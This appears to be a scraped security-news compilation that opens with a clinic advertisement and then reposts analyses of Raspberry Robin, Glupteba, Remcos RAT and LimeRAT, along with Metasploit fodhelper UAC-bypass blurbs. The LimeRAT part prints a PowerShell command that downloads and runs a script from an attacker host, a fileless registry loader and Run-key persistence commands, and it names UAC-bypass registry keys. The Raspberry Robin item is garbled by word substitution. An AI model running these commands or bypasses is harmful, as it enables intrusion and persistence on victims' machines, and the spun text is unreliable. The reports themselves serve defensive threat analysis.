💬 Feeling disconnected from intimacy? You might be experiencing Female Orgasmic Disorder — and you’re not alone. 💚

🔸 Trouble climaxing 🔸 Mild or no orgasms 🔸 Avoiding intimacy 🔸 Low satisfaction 🔸 Performance anxiety

✨ Don’t suffer in silence — help is available! 🩺 Consult confidentially with Relation Clinic. Reclaim your joy, naturally and safely. 💫

📞 Call: 9831072167 🌐 Visit: www.relationclinic.com 🔍 Scan to Know More or DM us now!

Warning about Raspberry Robin malware that threatens Windows

Microsoft has announced that it has found a malware called 'Raspberry Robin' on the networks of hundreds of organizations from different industries. The giant company described this software as 'high risk' and warned users. With the increasing use of the Internet, billions of people now spend most of their day online. However, it is a known fact that the cyber world has some scary aspects. Every day, we hear that malicious people are attacking cyber attacks or that defenses are being built against attacks. Now, a warning has come from the US-based Microsoft, one of the largest technology companies in the world, about such an issue. The giant company made statements about a high-risk malware, which is described as a 'worm' and infects hundreds of Windows corporate networks.

Microsoft Announces Finding 'High-Risk' Malware Infecting Hundreds of Windows Devices

It is stated that this malware is named 'Raspberry Robin' and spreads via USB devices containing '.LNK' file. According to the descriptions, this worm creates a msiexec.exe process via 'Command Prompt' at a user file and launches another malicious file. It is then stated that Raspberry Robin communicates with command and control servers via a short URL, and if the connection is successful, it downloads and installs a number of other malicious DLLs. It should be noted that Raspberry Robin is not a new malware, it was first noticed by some cybersecurity experts in 2021. In addition, Microsoft states that it has seen evidence that this software was used even in 2019. According to the news of Bleeping Computer, the giant company started to warn Defender for Endpoint subscribers about the dangers posed by Raspberry Robin, and stated that hundreds of organizations in multiple industries encountered worms in their Windows network.

New Raspberry Robin worm utilizes Windows Installer to drop malware

Red Canary knowledge examiners have found another Windows malware with worm capacities that spreads utilizing outside USB drives. This malware is connected to a group of malignant action named Raspberry Robin and was first seen in September 2021 (online protection firm Sekoia tracks this malware as "QNAP worm"). Red Canary's Detection Engineering group distinguished the worm in different clients' organizations, some in the innovation and assembling areas. At @sekoia_io we track it under the name "QNAP worm" even they seem to have shifted recently to some SOHO routers since the DeadBolt event that targeted few of their C2s :) https://t.co/RzvKi9JUn4— Félix Aimé (@felixaime) May 6, 2022 Raspberry Robin spreads to new Windows frameworks when a tainted USB drive containing a noxious .LNK record is associated. When joined, the worm generates another cycle utilizing cmd.exe to send off a pernicious record put away on the tainted drive.

Windows genuine devices manhandled to introduce malware

It utilizes Microsoft Standard Installer (msiexec.exe) to contact its order and-control (C2) servers, possible facilitated on compromised QNAP gadgets and utilizing TOR leave hubs as extra C2 foundation. "While msiexec.exe downloads and executes authentic installer bundles, enemies likewise influence it to convey malware," the specialists said. "Raspberry Robin utilizes msiexec.exe to endeavor outer organization correspondence to a vindictive space for C2 purposes." While they haven't yet found on the off chance that it lays out constancy and through which strategies, they suspect that the malware introduces a pernicious DLL record on compromised machines to oppose expulsion between restarts. Raspberry Robin dispatches this DLL with the assistance of two other real Windows utilities: fodhelper (a confided in paired for overseeing highlights in Windows settings) and odbcconf (a device for designing ODBC drivers). The first permits it to sidestep User Account Control (UAC), while the subsequent will help execute and arrange the DLL. Read the full article

Eine neue Variante nutzt einen als Fodhelper bezeichneten Bypass. Dabei kommt eine legitime Windows-Datei zum Einsatz. Sie soll Nutzern eigentlich helfen, auch ohne Administratorrechte bestimmte Programme auszuführen.

Windows UAC Protection Bypass (Via FodHelper Registry Key)

Windows UAC Protection Bypass (Via FodHelper Registry Key)

This Metasploit module will bypass Windows 10 UAC by hijacking a special key in the Registry under the current user hive, and inserting a custom command that will get invoked when the Windows fodhelper.exe application is launched. It will spawn a second shell that has the UAC flag turned off. This Metasploit module modifies a registry key, but cleans up the key once the payload has been invoked.…

View On WordPress

Original Post from Trend Micro Author: Trend Micro

by Jaromir Horejsi and Joseph C. Chen

We recently caught a malvertising attack distributing the malware Glupteba. This is an older malware that was previously connected to a campaign named Operation Windigo and distributed through exploit kits to Windows users. In 2018, a security company reported that the Glupteba botnet may have been independent from Operation Windigo and had moved to a pay-per-install adware service to distribute it in the wild. The activities of the actors behind Glupteba have been varied: they were suspected of providing proxy services in the underground, and were identified as using the EternalBlue exploit to move into local networks and run Monero (XMR) cryptocurrency miners.

After looking into the recent variant of the Glupteba dropper delivered from the malvertising attack, we found that the dropper downloaded two undocumented components aside from the Glupteba malware:

A browser stealer that can steal sensitive data, for example, browsing history, website cookies, and account names and passwords from browsers and send the information to a remote server.

A router exploiter that attacks MikroTik routers in local network with the CVE-2018-14847 vulnerability. It will schedule a task on the router for command and control (C&C) and upload the stolen administrator credentials to a remote server. A compromised router will be configured as a SOCKS proxy to relay malicious traffic, matching the original purpose of the Glupteba botnet on Windows.

In addition, an interesting feature we found inside the Glupteba dropper can retrieve the latest C&C domain from Bitcoin transactions. We explain this feature further in the next sections. It seems the operators are still improving their malware and may be trying to extend their proxy network to internet of things (IoT) devices.

Figure 1. Glupteba campaign attack flow

Figure 2. Pop-up malvertising on file-sharing websites downloaded Glupteba dropper

Analysis of the Glupteba dropper

The downloaded dropper binary is packed with a custom packer, written in Go programming language, and compiled to executable. The dropper first initializes ‘config information’ by acquiring current application information, operating information, hardware information, as well as some information hardcoded in binary. It creates a registry key HKEY_USERSSoftwareMicrosoftTestApp to store all the acquired information. The result of running the config initialization function is shown in the figure below.

Figure 3. Registries created by the Glupteba dropper

Then, the function sendParentProcesses acquires machine_guid from the registry, as well as distributor id and campaign id from the file name, product identification (PID), and names of parent processes. It then embeds this information in a POST request, encrypts it with an AES cipher, and uploads to the C&C server: hxxps:///api/parent-processes.

After that, the dropper checks if process is elevated and running as a SYSTEM user. If process is not elevated, it tries to exploit the fodhelper method to get it elevated. If it is elevated but not running as a SYSTEM user, it uses the “Run as Trusted Installer” method, likely inspired by this code, which uses a stolen winlogon process token to run process as SYSTEM.

The main dropper binary has embedded a few rootkit drivers used for hiding files and processes (WinMon32.sys, WinMon64.sys, WinMonFs32.sys, WinMonFs64.sys, WinMonprocessmonitor32.sys, WinMonProcessMonitor64.sys, WinmonSystemMonitor-10-64.sys, WinmonSystemMonitor-7-10-32.sys, WinmonSystemMonitor-7-64.sys) and a few other tools taken from GitHub used to help installing the necessary drivers (dsefix.exe and patch.exe.)

Function executeTask processes these main commands:

hide Hide task PID using embedded WinMon update Terminate and remove current version, replace with new version cleanup Uninstall

  Function mainInstall checks for installed antivirus (AV) programs, adds firewall rules, and adds defender exclusions.

Function mainPoll regularly polls the C&C server for new commands. It sends a POST request to hxxps:///api/poll. POST parameters look like the following (before encryption):

challenge=e94e354daf5f48ca&cloudnet_file=1&cloudnet_process=1&lcommand=0&mrt=1&pgdse=0&sb=1&sc=0&uuid=&version=145&wup_process=1&wupv=0.

The query is AES 256-encrypted.

Finally, function handleCommand implements backdoor functions.

Function Task update get_app_name is_admin process_is_running Queries “SELECT Name FROM Win32_Process WHERE Name =” exec download run run-v2 exit update Download and execute file update-data POST internal config to /bots/update-data update-cloudnet Download file from hxxp://nxtfdata[.]xyz/cl.exe, replaces cloudnet.exe file, which is Glupteba stop-wup Stop XMR mining stop-wupv Stop XMR mining stop-mrt notify Establish heartbeat, notification to URL with a given time interval, notifyHTTP, notifyH, notifyG, notifyS, notifyTCP, notifyTLS, notifyUDP notify-host Host for notification event-exists if Global\ exists mutex-exists if Global\ exists registry-get-startup HKEY_USERS%sSoftwareMicrosoftWindowsCurrentVersionRun verify-signature Verify signature of PE file registry-get-startup-signatures Verify signatures of PE files from startup verify-processes-signatures Enumerate processes, verify signatures get-unverified-files Calls VerifyProcessesSignatures and RegistryGetStartupSignatures, reports unverified files get-stats-wup Query hxxp://localhost:3433/, GET cryptominer stats, wup.exe is the open-source miner for XMR upload-file File upload update-service Download and run service get-logfile-proxy Read file \proxy\t install Download and run file, sendInstallReport get-logfile-i2pd Read file \i2pd\i2pd.log sc Take screenshot update-cdn Update C2 discover-electrum Use hardcoded Electrum wallet; read blockchain transaction data discover-blockchaincome Use hardcoded Bitcoin address, discover new C2 domain encrypted in bitcoin transaction data

  Notable C&C update capability

The backdoor mostly has standard capabilities, but one interesting feature stands out: This malware can update its C&C server address through the blockchain via the function discoverDomain.

The discoverDomain function can be run either by sending a backdoor command, or automatically by the dropper. DiscoverDomain first enumerates Electrum Bitcoin wallet servers using a publicly available list, then tries to query the blockchain script hash history of the script with a hardcoded hash.

This command then reveals all the related transactions.

Then each transaction is parsed, searching for the OP_RETURN instruction.

The pieces of data followed by OP_RETURN instruction are then used as parameters for AES decryption routine — the first 12 bytes are used as the AES GCM tag, and the following 32 bytes are the encrypted data. The 32-byte long AES key is hardcoded in binary file.

Therefore, 0f8f7cd39e1a5231b49f986b877befce0c2f558f0c1a9844833ac702cb3eba6e gets decoded to venoxcontrol[.]com, which is the current C&C server at the time of writing this publication.

This technique makes it more convenient for the threat actor to replace C&C servers. If they lose control of a C&C server for any reason, they simply need to add a new Bitcoin script and the infected machines obtain a new C&C server by decrypting the script data and reconnecting.

Browser stealer component

One observed component from the recent Glupteba variant is called “updateprofile”, which is a browser profile, cookies, and password extractor. The Chrome, Opera, and Yandex browsers are targeted — cookies, history, and other profile files are zipped and uploaded to the information collection server to path /api/log. Similar to the main dropper, this component is also written in Go, compiled to be executable, and packed with a UPX packer.

Another version of the browser stealer is called “vc.exe”. Its goal is to extract browser passwords and cookies and post the extracted data to the information collection server to path /bots/post-en-data?uuid=.

Router exploiter component

Another component we found downloaded by the Glupteba dropper is a router exploiter, which is also developed with Go language. It looks into the default gateway of the victim’s network. The list of default IP gateways is obtained by calling WMI command “SELECT DefaultIPGateway FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled = true”.

In addition to these addresses, the following three default addresses are added: 192.168.88.11, 192.168.0.1, 192.168.1.1.

Once the component successfully connects to the device listening on port 8291, it then attempts to exploit the device with the CVE-2018-14847 vulnerability, which affects the RouterOS system used on MikroTik routers. The exploit code was likely inspired by this code on exploit-db. It allows the attackers to grab the administrator’s credentials from unpatched routers. The grabbed account names and passwords are stored in a JSON object, encrypted, and POSTed to /api/router path of the C&C server.

Once credentials are successfully obtained, a task is added to the scheduler of the router. There are three methods implemented to add a scheduler task: using WinBox protocol, using SSH, or using API.

Figure 4. Example of scheduled task added by Glupteba campaign to compromised MikroTik routers

The router exploiter component scheduled a task named “U6” on compromised routers for command and control. The task will regularly check a C&C URL every 10 minutes and execute the content downloaded from it. The C&C URL is appended with a unique UUID, which is the same as the bot ID of Glupteba on the victim’s machine. The URL usually returns an HTTP 404 error; but when the bot master sends a command, it returns an RSC file, which is the format of the RouterOS configuration.

The file is the command from the bot master to control the router. In the attack we analyzed, we saw the C&C server send multiple RSC files step by step to configure the compromised router to be a SOCKS proxy. Here are the steps:

The first configuration changed the period of “U6” task schedule from 10 minutes to every 15 seconds.

The second configuration disabled services, including winbox, telnet, api, and api-ssl. This is most likely to prevent the router from being compromised by other attackers through the same vulnerability. Then it opened the SSH and SOCKS services, which are listening on randomly assigned ports, and created a firewall rule to accept external connection to the SOCKS port.

The third configuration removed the existing SOCKS access list on the compromised router.

The fourth configuration added a new SOCKS access list to limit the service so that it only accepts connections from specified IP ranges. These ranges are probably where the attackers’ servers are.

Relayed traffic on compromised routers

After the above-mentioned setups, the compromised router became a SOCKS proxy for the attackers to relay traffic. We monitored a compromised router to see what kind of traffic is transferred. The first remote connection routed through the SOCKS proxy is from a server, which likely belongs to the attackers. This server queries “http://ip-api[.]com/json”, which returns the IP address of the current SOCKS proxy server. This query is sent repeatedly, probably to monitor the SOCKS proxy service.

After the first check on the router status, we started seeing different servers with two types of traffic connected to the proxy. The first one is spam traffic. We saw a remote server establish SMTP connections to different mail servers through the SOCKS proxy of compromised routers. If a mail server accepted the connection, that remote server started to send spam mail. The spam mail delivered seems to be related to the notorious “Canadian Pharmacy” spam.

Figure 5. Example of spam traffic sent through a compromised router

Figure 6. “Canada Pharmacy” website redirected from spam mail

Besides the spam traffic, we saw other traffic from a set of remote servers that were repeatedly connecting to Instagram. However, the traffic sent through was protected by HTTPS encryption. We can’t decrypt it and don’t know what exactly these connections are for. One theory is that it is the password-reuse attack hitting Instagram. It was previously reported to be one type of malicious traffic proxied through the Glupteba botnet.

Figure 7. Example of Instagram connection (HTTPS-encrypted) relayed by a compromised router

As mentioned, Glupteba still seems to be evolving and adding capabilities. New techniques, such as updating C&C servers through data obtained from Bitcoin transactions, show that the malicious actors behind this malware are adopting little-used techniques to try and keep their malware active. Since it is already proven to be an information stealer and a proxy for malicious spam, users and enterprises should be wary of this threat.

Security recommendations

Malvertising is a widespread threat that can affect users and businesses alike. A multilayered approach to security is important — from the gateway, endpoints, networks, and servers. Trend Micro solutions powered by XGen security, such as Trend Micro Security and Trend Micro Network Defense, can detect related malicious files and URLs and protect users’ systems. Trend Micro Smart Protection Suites and Trend Micro Worry-Free Business Security, which have behavior monitoring capabilities, can additionally protect from these types of threats by detecting malicious files, as well as blocking all related malicious URLs.

Security should be top of mind when setting up routers — most devices across homes and offices are connected to these devices and can be affected if a router is compromised. Although manufacturers play important roles in securing routers and other devices, users and businesses can adopt good security practices to defend against threats. Also, deploying tools that provide additional security to home networks and devices connected to them further strengthens defenses.

For a full list of the Indicators of Compromise for this malware, please see this document.

The post Glupteba Campaign Hits Network Routers and Updates C&C Servers with Data from Bitcoin Transactions appeared first on .

#gallery-0-5 { margin: auto; } #gallery-0-5 .gallery-item { float: left; margin-top: 10px; text-align: center; width: 33%; } #gallery-0-5 img { border: 2px solid #cfcfcf; } #gallery-0-5 .gallery-caption { margin-left: 0; } /* see gallery_shortcode() in wp-includes/media.php */

Go to Source Author: Trend Micro Glupteba Campaign Hits Network Routers and Updates C&C Servers with Data from Bitcoin Transactions Original Post from Trend Micro Author: Trend Micro by Jaromir Horejsi and Joseph C. Chen We recently caught a malvertising attack distributing the…

Finished Reading: UAC Bypass – Fodhelper

https://ift.tt/2r2s7Vz via Read it Later (June 11, 2017 at 10:31AM )

Windows Bypassuac COMHijack Privilege Escalation Exploit

Windows Bypassuac COMHijack Privilege Escalation Exploit

Recently, we saw the Windows Fodhelper Privilege escalation exploit. Today we will learn about another Windows privilege escalation exploit that works on machines from Windows 7 to Windows 10. This exploit bypasses the User Account Control of the Windows and gives us system privileges. Its called Windows BypassUAC COMhijack exploit. How does it do this? Let us see. COM stands for Component Object…

View On WordPress

Windows UAC Protection Bypass (Via FodHelper Registry Key)

http://i.securitythinkingcap.com/PKZk9q #PenTest

Original Post from Trend Micro Author: Trend Micro

By Aliakbar Zahravi (Malware Researcher)

In July, we came across a phishing email purporting to be a new order notification, which contains a malicious attachment that leads to the remote access tool Remcos RAT (detected by Trend Micro as BKDR_SOCMER.SM). This attack delivers Remcos using an AutoIt wrapper that incorporates various obfuscation and anti-debugging techniques to evade detection, which is a common method for distributing known malware.

Remcos RAT emerged in 2016 being peddled as a service in hacking forums — advertised, sold, and offered cracked on various sites and forums. The RAT appears to still be actively pushed by cybercriminals. In 2017, we reported spotting Remcos being delivered via a malicious PowerPoint slideshow, embedded with an exploit for CVE-2017-0199. Recently, the RAT has made its way to phishing emails.

The malicious actor behind the phishing email appears to use the email address rud-division@alkuhaimi[.]com (with a legitimate domain) and the subject “RE: NEW ORDER 573923”. The email includes the malicious attachment using the ACE compressed file format, Purchase order201900512.ace, which has the loader/wrapper Boom.exe.

Analyzing the wrapper/loader

After converting the executable to AutoIt script, we found that the malicious code was obfuscated with multiple layers, possibly to evade detection and make it difficult for researchers to reverse. The top layer of obfuscation is shown in the following:

Figure 1. Obfuscated core functions

Figure 2. Functions used for deobfuscation

The main goal of the Boom.exe file is to achieve persistence, perform anti-analysis detection, and drop/execute Remcos RAT on an affected system. The above snippet code first calculates the value inside the array and then uses the ChrW() function to convert the Unicode number to the character.

Figure 3. Sample of string decoding

In some cases after decryption, the malware uses the AutoIt function called BinaryToString() to deobfuscate the next layer. The following code snippet demonstrates this behavior:

Figure 4. AutoIt Binary to String decoding

After deobfuscation, the AutoIt code can be seen containing large amounts of junk code meant to throw analysts off the track.

Figure 5. Sample of junk code

The malware then creates a copy of itself in %AppData%RoamingappidapiUevTemplateBaselineGenerator.exe and loads the main payload (Remcos RAT) from its resource section. The malware then prepares the environment to execute the main payload. It achieves this by executing the following Shellcode (frenchy_shellcode version 1).

Figure 6. Frenchy_ShellCode_001

Figure 7. Executing and decoding Frenchy Shellcode

Figure 8. Frenchy Shellcode Mutant

Decoding and loading Remcos from resources

The DecData() function loads the data from its resource then reverses all data and replaces “%$=” with “/”.

Figure 9. AutoIt decoding the main payload: Code + encoded resource (Remcos RAT)

Figure 10. AutoIt decoding the main payload: Code only

Then it uses the following to decode the base64 PE file, which is the main payload:

$a_call = DllCall(“Crypt32.dll”, “int”, “CryptStringToBinary”, “str”, $sData, “int”, 0, “int”, 1, “ptr”, 0, “ptr”, DllStructGetPtr($struct, 1), “ptr”, 0, “ptr”, 0)

Figure 11. Decoding Remcos from AutoIt

Loader features

Anti-VM

This AutoIt loader is capable of detecting a virtual machine environment by checking vmtoolsd.exe and vbox.exe in the list of running processes. However, it should be noted that this feature is not invoked in this sample.

Figure 12. AutoIt loader’s Anti-VM

Bypass UAC

Depending on the Windows version, the malware uses either the built-in Event Viewer utility (eventvwr) or fodhelper to bypass the User Account Control (UAC).

Figure 13. UAC bypass

Anti-Debugging

If the loader detects IsdebuggerPresent in the system, it will display the message, “This is a third-party compiled AutoIt script.” and exits the program.

Figure 14. AutoIt loader checks for a debugger

Examining the main payload, Remcos RAT

Originally marketed as a remote access tool that legitimately lets a user control a system remotely, Remcos RAT has since been used by cybercriminals. Once the RAT is executed, a perpetrator gains the ability to run remote commands on the user’s system. In a past campaign, for instance, the tool was seen with a variety of capabilities, which includes downloading and executing commands, logging keys, logging screens, and capturing audio and video using the microphone and webcam.

For the analysis of this payload, we looked into the sample Remcos Professional version 1.7.

Figure 15. Remcos version

Upon execution, depending on the configuration, the malware creates a copy of itself in %AppData%remcosremcos.exe, uses install.bat to execute remcos.ex$ from the %APPDATA% directory, and finally deletes itself. It then creates the following Run key in the Registry to maintain persistence on the system.

Figure 16. Install.bat dropped by Remcos

Figure 17. Remcos RAT changes the Registry entry to maintain persistence

Figure 18. Reflected Remcos RAT change in the Registry

The malware retrieves the configuration called “SETTING” from its resource section.

Figure 19. Remcos loads the encrypted settings from its resources

The content of the configuration is encrypted using the RC4 algorithm, as seen below:

Figure 20. Remcos encrypted configuration

The following, on the other hand, is the RC4 algorithm used to decrypt the above configuration:

Figure 21. RC4 algorithm to decrypt the configuration

Figure 22. Decrypted configuration

The malware then creates the following mutex to mark its presence on the system:

Figure 23. Remcos RAT mutex

It then starts to collect system information such as username, computer name, Windows version, etc., which it sends to the command and control (C&C) server. The malware encrypts the collected data using the RC4 algorithm with the password “pass” from the configuration data.

Figure 24. Remcos collecting system information

Figure 25. Clear text data collected by Remcos, where “|cmd|” is the delimiter

Figure 26. Data is encrypted and sent to C&C server

Figure 27. Encrypted data

The following list shows some of the commands supported by the malware:

Commands Description Clipboarddata Getclipboard Setclipboard Emptyclipboard Clipboard manager deletefile Delete file(s) downloadfromurltofile Download a file from specified URL and execute it on an infected system execcom Execute a shell command filemgr File manager getproclist List the running processes initremscript Execute remote script from C&C keyinput Keylogger msgbox Display a message box on an infected system openaddress Open a specified website OSpower Shutdown, restart, etc. ping Ping an infected system (used for network check) prockill Kill a specific process regopened   regcreatekey regeditval  regdelkey   regdelval   regopen     initregedit Add, edit, rename, or delete registry values and keys scrcap Screen capture sendfiledata Upload data to C&C server uninstall Uninstall itself from an infected system

Table 1. Remcos RAT commands

The “consolecmd” command shown in the next figure, for instance, is used to execute shell commands on an infected system:

Figure 28. Some examples of Remcos RAT’s commands

Figure 29. Browser/cookie-stealing feature

After analyzing this Remcos variant — its configuration data, communication mechanism, and functionalities — we saw that it had many similarities with its older variant (detected as Backdoor.Win32.Remcosrat.A). However, this particular campaign delivers Remcos using an AutoIt wrapper, which incorporates different obfuscation and anti-debugging techniques to avoid detection.

Prevention and Trend Micro Solutions

To defend against threats like Remcos RAT that use email-based attacks, we advise users to refrain from opening unsolicited emails — especially those with attachments — from unknown sources. Users should also exercise caution before clicking on URLs to avoid being infected with malware. For enterprises, if an anomaly is suspected in the system, report the activity to the network administrator immediately. We also recommend these best practices for added protection:

Learn how to identify phishing emails and spot indicators of unwanted emails (i.e., misspellings, odd vocabulary)

Update applications and systems regularly

Apply whitelisting, block unused ports, and disable unused components

Monitor traffic in the system for any suspicious behavior

Implementing security solutions with anti-spam filtering should weed out spam messages such as the one discussed here. The use of a multilayered solution such as Trend Micro Deep Discovery will help provide detection, in-depth analysis, and proactive response to today’s stealthy malware such as Remcos RAT, and targeted attacks in real-time. It provides a comprehensive defense tailored to protect organizations against targeted attacks and advanced threats through specialized engines, custom sandboxing, and seamless correlation across the entire attack lifecycle. Trend Micro Deep Discovery Email Inspector prevents malware from reaching end users. For a more comprehensive security suite, organizations can consider the Trend MicroCloud App Security solution, which employs machine learning (ML) in web reputation and URL dynamic analysis. The solution can also detect suspicious content in the message body and attachments as well as provide sandbox malware analysis and document exploit detection.

Indicators of Compromise (IoCs)

File Name Note SHA-256 Hash Trend Micro Pattern Detection Trend Micro Predictive Machine Learning Detection Purchase order201900512.ace Email attachment (ACE) cf624ccc3313f2cb5a55d3a3d7358b4bd59aa8de7c447cdb47b70e954ffa069b Backdoor.Win32.REMCOS.USMANEAGCF Boom.exe (Loader/Wrapper) ACE file content (Win32 EXE) 1108ee1ba08b1d0f4031cda7e5f8ddffdc8883db758ca978a1806dae9aceffd1 Backdoor.Win32.REMCOS.USMANEAGCF Troj.Win32.TRX.XXPE50FFF031 remcos.ex$ Remcos RAT (Win32 EXE) 6cf0a7a74395ee41f35eab1cb9bb6a31f66af237dbe063e97537d949abdc2ae9 BKDR_SOCMER.SM Troj.Win32.TRX.XXPE50FFF031 rud-division@alkuhaimi[.]com Sender ID

The post Analysis: New Remcos RAT Arrives Via Phishing Email appeared first on .

#gallery-0-5 { margin: auto; } #gallery-0-5 .gallery-item { float: left; margin-top: 10px; text-align: center; width: 33%; } #gallery-0-5 img { border: 2px solid #cfcfcf; } #gallery-0-5 .gallery-caption { margin-left: 0; } /* see gallery_shortcode() in wp-includes/media.php */

Go to Source Author: Trend Micro Analysis: New Remcos RAT Arrives Via Phishing Email Original Post from Trend Micro Author: Trend Micro By Aliakbar Zahravi (Malware Researcher) In July, we came across a phishing email purporting to be a new order notification, which contains a malicious attachment that leads to the remote access tool Remcos RAT (detected by Trend Micro as BKDR_SOCMER.SM).

Original Post from Security Affairs Author: Pierluigi Paganini

Cybaze-Yoroi ZLab team spotted an interesting infection chain leveraging several techniques able to defeat traditional security defences and spread LimeRAT.

Introduction

Few days ago, Cybaze-Yoroi ZLab team came across an interesting infection chain leveraging several techniques able to defeat traditional security defences and hiding a powerful inner payload able to seriously threaten its victims. 

The whole infection chain was originated by a LNK file, a technique used by advanced attackers and APTs too, for this reason, we decided to have a deeper look into these malicious samples revealing another infamous abuse of open-source projects. Too many times turned into fully-featured malware implants by unethical hackers and cyber criminals.

Technical Analysis

The origin of the infection chain is a simple LNK file, a technique originally adopted by state sponsored and advanced actors, designed to download and run a powershell file named “rdp.ps1” from a remote location through the command:

C:WindowsSystem32WindowsPowerShellv1.0powershell.exe -ExecutionPolicy Bypass -Windo 1 $wm=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String(‘aWVY’));sal g $wm;$IF=((New-Object Net.WebClient)).DownloadString(‘https://hacks4all[.net/rdp.ps1’);g $I

The retrieved Powershell script works as dropper of the whole infection chain.

Sha256 141fd1e267a092d5525ba91b5817c324ccd9ec20a0d5c6b5cdfb899ca5cda039 Threat Powershell Dropper Brief Description Powershell dropper of LimeRAT Ssdeep 1536:7Tty9ugHMeQdOaqZyyhWI6WGf6J705549G:7Ti2dOaqZyyhp8fQkCG

This script firstly retrieves the version of the Windows OS installed on the target machine using the “Get-WmiObject -Class Win32_OperatingSystem | Select-Object -ExpandProperty Version”  command. Then, depending on the returned value, it runs a couple of privilege escalation exploits able to bypass the UAC (User Account Control) feature, a well known security mechanism introduced since Vista to avoid unauthorized system configuration changes. The first one targets the Windows versions lower than 8.1, abusing a design flaw on the EventViewer process to execute a command with higher privileges.

This exploit works quite easily: the malware gains access to the registry key “HKCU:SoftwareClassesmscfileshellopencommand” and inserts here the command to run its own payload, forcing its execution through the “eventvwr.exe” process which, due to a security flaw, executes it with the maximum privileges available.

Figure 1: Check of the target Windows version and preparation for the eventvwr.exe process exploit

The second exploit targets Windows 10 operating systems: it leverages a vulnerability inside the FODhelper process. The principle of this exploit is similar to the previous one, but the accessed registry key is “HKCU:SoftwareClassesms-settingsShellOpencommand” and the vulnerable process is “fodhelper.exe”.

Figure 2: Check of the target Windows version and preparation for the fodhelper.exe process exploit

These two exploits are both used to run a Powershell payload which, after its decoding, results in the invocation of an additional JavaScript code. The body of this script contains a unique anonymous function embedding other sub-functions and an enormous obfuscated variable.

Figure 3: Payload encoded in Base64 format and obfuscated with a custom subroutine

Figure 4: Piece of de-obfuscation subroutine

Its payload is a parameterized Powershell script having the purpose to install the final payload into the user registry hive, concluding the infection chain.

[

“Wscript.Shell”,

“scriptfullname”,

“scriptname”,

“powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command “,

“%”,

“ExpandEnvironmentStrings”,

“Temp”,

“\”,

“fromCharCode”,

“[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable(‘Temp’)+’\”,

“‘,[System.IO.File]::ReadAllText(‘”,

“‘));wscript ‘”,

“‘”,

“Run”,

“Quit”,

“New-ItemProperty -Path ‘HKCU:\Software\Microsoft\Windows\CurrentVersion\Run’ -name ‘FileName’ -value ‘”,

“‘ -PropertyType String -Force;”,

“[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+’\”,

“‘))”,

” ##### FINAL PAYLOAD ##### “

“HKCU\SOFTWARE\Microsoft\\Winkey”,

“Scripting.FileSystemObject”,

“REG_SZ”,

“regwrite”,

“$_b = (get-itemproperty -path ‘HKCU:\SOFTWARE\Microsoft\’ -name ‘Winkey’).Winkey;$_b=$_b.replace(‘~’,’0′);[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);”

]

Figure 5: Final payload written in the registry key in base64 Format

The Payload

Figure 6. Static payload data

The installed payload actually is a Base64 encoded PE32 file, file-lessly stored within the registry hive to avoid antivirus detection. It is written in C# and requires at least the .NET framework 3.2 to run. Exploring the malware code, we detected multiple evidence indication of the possible belonging malware family: LimeRAT.

LimeRAT is a powerful Remote Administration Tool publicly available to any internet user, it is an open-source project freely available on Github. Comparing its source code to the decompiled sample we were able to confirm there is a high compatibility between the payload and this open-source remote administration tool.

Figure 7: Decompiled code (on the left) and source code (on the right) on Github platform

The function reported above closely matches the open-source code. It also codes an interesting feature of the implant, in fact it allows the malware to register itself as “Critical Process” and when the user tries to kill it, a Blue Screen of Death (BSoD) is raised on the victim machine. Besides this peculiar tricks, the malware has a complete set of very powerful and dangerous capabilities, such as:

USB drive propagation, infecting all files and folders on USB drivers.

Evasive startup methods (fileless) to avoid AV detection.

Virtual machines and analysis box awareness to avoid detection.

Stealer and CryptoStealer module to steal cryptocurrency wallets and saved passwords.

Keylogger module

Backdoor and RDP access.

C2 Server

Figure 8. C2 retrieval

The malware command and control infrastructure abuses the Pastebin service to ensure resilience, in fact the malware dynamically retrieves the real C2 destination address from a pastie over an encrypted HTTPS channel. 

Also, the attacker behind this sample leans on the Dynamic DNS service “warzonedns.com”, pointing to the 213.183.58[.10 IP address located in Russia. 

Investigating this network destination we figured out the registrar email, “anthony.marshall.1986[@gmail[.com”, is well known: this email appears in another AdWind/JRat malicious campaign dated back in 2017, suggesting this malicious actor is active for a long time. 

Persistence Mechanisms

This sample also uses multiplepersistence mechanisms, making more difficult to an improvised incident responder to get rid of the infection, because the choice to add this redundancy helps to ensure the infection last longer. In detail, it leverages at least three different persistence tricks, copying itself in three different paths:

C:UsersadminAppDataRoamingMicrosoftWindowsStart MenuProgramsStartup

C:Userspublic

%APPDATA%LocalTemp

Figure 9: The persistence mechanisms of the malware

The JavaScript code is executed through the following powershell command:

“C:WindowsSystem32WindowsPowerShellv1.0powershell.exe” -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command “New-ItemProperty -Path ‘HKCU:SoftwareMicrosoftWindowsCurrentVersionRun’ -name ‘FileName’ -value ‘C:UsersadminAppDataLocalTempfuw.js’ -PropertyType String -Force;”

Conclusion

The analyzed case evidences how open-source projects are often abused by cyber criminals to pursue their malicious objectives and, even if the malware code and behaviour are well known, how those threat families are constantly re-arranged to avoid basic security controls, along with the observation of how cyber-criminals challengingly insist in their illicit operations over the years, refining their techniques to penetrate companies boundaries.

Technical details, including IoCs and Yara Rules, are available in the analysis published on the Yoroi blog.

LimeRAT spreads in the wild

window._mNHandle = window._mNHandle || {}; window._mNHandle.queue = window._mNHandle.queue || []; medianet_versionId = "3121199";

try { window._mNHandle.queue.push(function () { window._mNDetails.loadTag("762221962", "300x250", "762221962"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – LimeRAT, malware)

The post LimeRAT spreads in the wild appeared first on Security Affairs.

#gallery-0-6 { margin: auto; } #gallery-0-6 .gallery-item { float: left; margin-top: 10px; text-align: center; width: 33%; } #gallery-0-6 img { border: 2px solid #cfcfcf; } #gallery-0-6 .gallery-caption { margin-left: 0; } /* see gallery_shortcode() in wp-includes/media.php */

Go to Source Author: Pierluigi Paganini LimeRAT spreads in the wild Original Post from Security Affairs Author: Pierluigi Paganini Cybaze-Yoroi ZLab team spotted an interesting infection chain leveraging several techniques able to defeat traditional security defences and spread LimeRAT.